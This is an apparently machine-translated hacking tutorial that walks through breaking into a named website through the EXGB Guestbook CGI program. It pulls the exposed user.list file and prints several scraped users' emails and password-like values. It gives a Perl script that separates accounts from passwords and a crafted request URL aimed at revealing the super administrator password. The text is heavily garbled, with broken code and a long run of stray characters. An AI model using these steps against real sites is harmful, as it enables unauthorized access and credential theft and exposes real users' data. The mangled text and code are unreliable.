A virtual intrusion through by analyysist http://www.china4lert.org This is a virtual invasion, because the process of intrusion is virtual, but this invasion is very true, because We can invade any similar website in the way they are introduced. The basic situation of the host we are about to invadiate is as follows: Operating system: redhat Linux v7.1 host address: http://www.notfound.org web server: Apache v1.3.20 is good, nonsense, let's start! In general, if a website administrator is completely difficult, we should be difficult to find a vulnerability from the operating system and web server, and this administrator looks more diligent, we have made some simple tests. And finally decided to start with CGI. After some time observation and analysis, we found that the CGI program running on this website mainly has two, one is a forum, the name has not heard, the other is EXGB GUESTBOOK. Just tried the forum, I feel that it should be more secure, at least the error handles do it, I have submitted a few special requests even if the system information didn't get, it seems that I can't find any breakthrough. But what about EXGB GUESTBOOK? Vulnerability, if you want to know the specific details of the vulnerability, you can visit the following link: EXGB GUESTBOOK leaks registered user information vulnerability: http://v7.51.net/exploites/gBook1.txt EXGB GUESTBOOK Learning Super Administrator Password Vulnerability: http://v7.51.net/exploites/gbook2.txt exgb Guestbook overwrites any ".php" file vulnerability: http://v7.51.net/exploites/gbook3.txt is ok, let's come first Take a look at the registered user information of this message board, check in the IE address: http://www.notfound.org/gbook/data/User.list See what we have seen? 820 Medana |!:! | CCTV6 |!:! | Medana@163.net |!:! | Http://souce.myrice.com |!:! | Xing xing liu yan 23423432 |!:! | 111 | :! | 111@sina.com |!:! | Http://333.com |!:! | My message stzzx |!:! | Honker2003@21cn.com |! !!..................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! com |!!! | Science fi ... haha. . .
There are more than 800 registered users, it seems to be a relatively well-known big station, but why should I use such a bad CGI program? Is this awareness of this CGI program? Is the well-known high? // sigh ... now people! I am not interested in the information of these registered users, but I really want to study what kind of string is used as a password, so I wrote a small program to isolate the registered user's account and password, the source code is as follows: # ! / usr / bin / perl #this Tool Is Designed by Analysist #welcome to visit http://www.china4lert.org $ argc = @ argv; if ($ argc! = 1) {print "USAGE: $ 0 / N "; EXIT (1);} $ datafile = shift; if (! (- e $ datafile) {print" file not found! / n ";} $ user =" user.db "; $ pass =" Pass.db "; if (-e $ user) {unlink $ user;} f (-e $ pass) {unlink $ pass;} Open (data, $ datafile); open (user," >> $ user ") Open (Pass, ">> $ pass"); while ($ line = ) {if ($ line = ~ // |!:! / | /) {@ data = split (// |! ! / | /, $ tine); Print User $ data [0]. "/ n"; Print Pass $ data [1]. "/ n";}} is simple, here I suggest you learn the Perl language, because It is indeed a very good language, and its text handling capacity is that other languages cannot match. The results of the analysis must be surprised, about 90% of the user password is a digital sequence, and about 5% of the user account and password are the same, this has to let you worry about the safety awareness of domestic users? ! Ok, let's take a look at what the super administrator's password is, we submit a request: http://www.notfound.org/gbook/index.php?action=reg&name=test&assword1=$password2=$pass&uth=$pass&email= Test@test.org&home=http://www.test.org&title=$Pass&ubb=1&html=1&page=5&up=Header&down=Footer®sub=
